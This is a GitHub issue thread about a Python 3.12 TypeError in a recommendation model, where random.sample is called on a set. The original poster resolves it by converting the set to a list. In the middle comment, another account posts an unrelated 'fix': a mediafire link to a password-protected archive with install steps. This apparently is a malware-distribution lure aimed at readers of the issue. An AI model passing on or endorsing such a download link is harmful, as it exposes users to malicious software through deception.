### ISSUE TITLE
Error in masked_item

### ISSUE THREAD

**Issue by Viile1** [liming-7/Mask-Swap-NNBR#2]
Traceback (most recent call last):
  File "/home/ai/Desktop/Kaan/next-basket-recommendation-system/Mask/NBR/nnbr/train_main_gpu_batch.py", line 345, in <module>
    train_model(model, optimizer, optimizer_2, train_bert_data_loader, train_nbr_data_loader, val_data_loader, test_data_loader, config)
  File "/home/ai/Desktop/Kaan/next-basket-recommendation-system/Mask/NBR/nnbr/train_main_gpu_batch.py", line 252, in train_model
    bert_loss = model.calculate_bert_loss(item_seq, position_seq)
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ai/Desktop/Kaan/next-basket-recommendation-system/Mask/NBR/nnbr/bert4nbr.py", line 343, in calculate_bert_loss
    masked_item_seq, swaped_position_seq, pos_items, neg_items, masked_index = self.reconstruct_bert_train_data(item_seq, position_seq)
                                                                               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/ai/Desktop/Kaan/next-basket-recommendation-system/Mask/NBR/nnbr/bert4nbr.py", line 126, in reconstruct_bert_train_data
    masked_item = random.sample(item_set, mask_cnt)
                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.12/random.py", line 413, in sample
    raise TypeError("Population must be a sequence.  "

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Viile1** [comment]
I solved, 
masked_item = random.sample(list(item_set), mask_cnt)
